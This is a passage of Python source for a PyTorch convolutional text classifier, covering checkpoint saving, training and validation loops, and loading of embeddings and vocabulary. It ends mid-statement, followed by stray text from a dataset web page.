logger.info("Saved Pytorch CNN model checkpoint to {}".format(ckpt_filepath))
with open(
os.path.join(checkpoint_dir, "cnn_labels.txt"), "w", encoding="utf-8"
) as file_out:
file_out.write("\n".join(self.labels))
with open(
os.path.join(checkpoint_dir, "cnn_vocab.txt"), "w", encoding="utf-8"
) as file_out:
logger.info("Sorting {} words...".format(len(self.vocabulary)))
sorted_vocabulary = [
kv[0] for kv in sorted(self.vocabulary.items(), key=itemgetter(1))
]
logger.info("Saving sorted vocabulary...")
file_out.write("\n".join(sorted_vocabulary))
logger.info("Saving Pytorch CNN ended")
def _train_classifier(self, training_samples: np.array, target_labels: np.array):
logger.info("Training PyTorch_CNN......")
if cuda.is_available():
device = 'cuda'
else:
device = 'cpu'
device = 'cpu'
self.to(device)
batcher_train = DataLoader(My_Dataset(training_samples, target_labels),
batch_size=self.properties.model__batch_size, shuffle=False)
criterion = torch.nn.CrossEntropyLoss()
self.optimizer = torch.optim.Adam(self.parameters(),
lr=self.properties.model__learning_rate, weight_decay=self.weight_dacay)
iteration = 0
for epoch in range(self.properties.model__max_epoch_num):
self.epoch = epoch
for i, (samples, labels) in enumerate(batcher_train):
self.train()
if labels.shape[0] != self.properties.model__batch_size:
break
samples = samples.to(device)
labels = labels.to(device)
self.optimizer.zero_grad()
outputs = self(samples)
self.loss = criterion(outputs, torch.argmax(labels, 1, keepdim=False))
self.loss.backward()
self.optimizer.step()
_, predicted = torch.max(outputs.data, 1)
torch.cuda.empty_cache()
iteration += 1
if iteration == self.best_step:
break
logger.info("Finished training CNN")
@profile
def _train_classifier_with_test(
self,
training_samples: np.array,
test_samples: np.array,
target_labels: np.array,
target_test_labels: np.array,
) -> Tuple[float, int]:
logger.info('num_classes {}'.format(len(self.labels)))
print('num_classes {}'.format(len(self.labels)))
logger.info("Training PyTorch_CNN...")
max_acc_dev = 0.0
best_step_dev = -1
if torch.cuda.is_available():
# Tell PyTorch to use the GPU.
device = torch.device("cuda")
print('There are %d GPU(s) available.' % torch.cuda.device_count())
# If not...
else:
print('No GPU available, using the CPU instead.')
device = torch.device("cpu")
# device = 'cpu'
if device==torch.device("cuda"):
print('We will use the GPU:', torch.cuda.get_device_name(0))
else:
print('We will use CPU')
self.to(device)
# shuffle поставил false для воспроизводимости результатов
batcher_train = DataLoader(My_Dataset(training_samples, target_labels),
batch_size=self.properties.model__batch_size, shuffle=False)
batcher_val = DataLoader(My_Dataset(test_samples, target_test_labels),
batch_size=self.properties.model__batch_size, shuffle=False)
criterion = torch.nn.CrossEntropyLoss()
self.optimizer = torch.optim.Adam(self.parameters(),
lr=self.properties.model__learning_rate,
weight_decay=self.weight_dacay)
iteration = 0
# self.properties.model__max_epoch_num = 1
for epoch in range(self.properties.model__max_epoch_num):
for i, (samples, labels) in enumerate(batcher_train):
self.train()
if labels.shape[0] != self.properties.model__batch_size:
break
samples = samples.to(device)
labels = labels.to(device)
self.optimizer.zero_grad()
outputs = self(samples)
self.loss = criterion(outputs, torch.argmax(labels, 1, keepdim=False))
self.loss.backward()
self.optimizer.step()
_, predicted = torch.max(outputs.data, 1)
torch.cuda.empty_cache()
iteration += 1
if iteration % self.properties.model__evaluate_every == 0:
loss = 0.0
accuracy = 0.0
self.eval()
for j, (samples, labels) in enumerate(batcher_val):
if labels.shape[0] != self.properties.model__batch_size:
break
samples = samples.to(device)
labels = labels.to(device)
outputs = self(samples)
loss += criterion(outputs, torch.argmax(labels, 1, keepdim=False)) * \
samples.shape[0] / float(test_samples.shape[0])
_, predicted = torch.max(outputs.data, 1)
accuracy += accuracy_score(predicted.cpu().numpy(),
np.argmax(labels.data.cpu().numpy(), axis=1)) * \
samples.shape[0] / float(test_samples.shape[0])
if accuracy > max_acc_dev:
max_acc_dev = accuracy
best_step_dev = iteration
print('iter: {}, loss: {}, accuracy: {}'.format(iteration, loss, accuracy))
logger.info("Finished training PyTorch_CNN, test accuracy={:.2f}"
.format(max_acc_dev))
return max_acc_dev, best_step_dev
def _init_embeddings_and_vocab(self, embeddings_file: str, vocab_file: str,
embeddings_dim: int) -> Tuple[np.array, dict]:
if embeddings_file is None or vocab_file is None:
logger.info("Embeddings files are not specified. Perform random initialization of embeddings...")
embeddings = np.random.uniform(low=-0.2, high=0.2, size=(2, embeddings_dim))
vocab = {'<PAD>': 0, '<UNK>': 1}
else:
embeddings = self._load_embeddings(embeddings_file)
vocab = self._load_word2vec_vocabulary(vocab_file)
return embeddings, vocab
def _load_embeddings(self, embeddings_file: str) -> np.array:
try:
embeddings = np.load(embeddings_file).T
except FileNotFoundError as e:
message = "Embeddings file doesn't exist: {}".format(e)
logger.error(message)
raise FileNotFoundError(message)
except ValueError as e:
message = "Embeddings file couldn't load: {}".format(e)
logger.error(message)
raise ValueError(message)
return embeddings
def _load_word2vec_vocabulary(self, vocab_file: str) -> dict:
vocab = {}
# Added a check to not wrap the whole "with ... as" block with try/except
if not os.path.exists(vocab_file):
message = "Vocabulary file doesn't exist"
logger.error(message)
raise FileNotFoundError(message)
with open(vocab_file, encoding="utf-8") as vfile:
unk_num = 0
for line_num, line in enumerate(vfile):
line = line.strip()
try:
cur_word, cur_num_of_occur = line.split()
except ValueError:
cur_word = "unkword_%i" % unk_num
unk_num += 1
if cur_word in vocab.keys():
cur_word = "unkword_%i" % unk_num
unk_num += 1
vocab[cur_word] = line_num
return vocab
def _add_unknown_words_to_model(self, train_data_texts: List[List[str]]):
logger.info("Adding unknown words to model...")
word_list = [w for text in train_data_texts for w in text]
word_set = set(word_list)
initial_vocab_len = len(self.vocabulary)
vocab_set = set(self.vocabulary.keys())
new_words_set = set.difference(word_set, vocab_set)
number_added_words |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.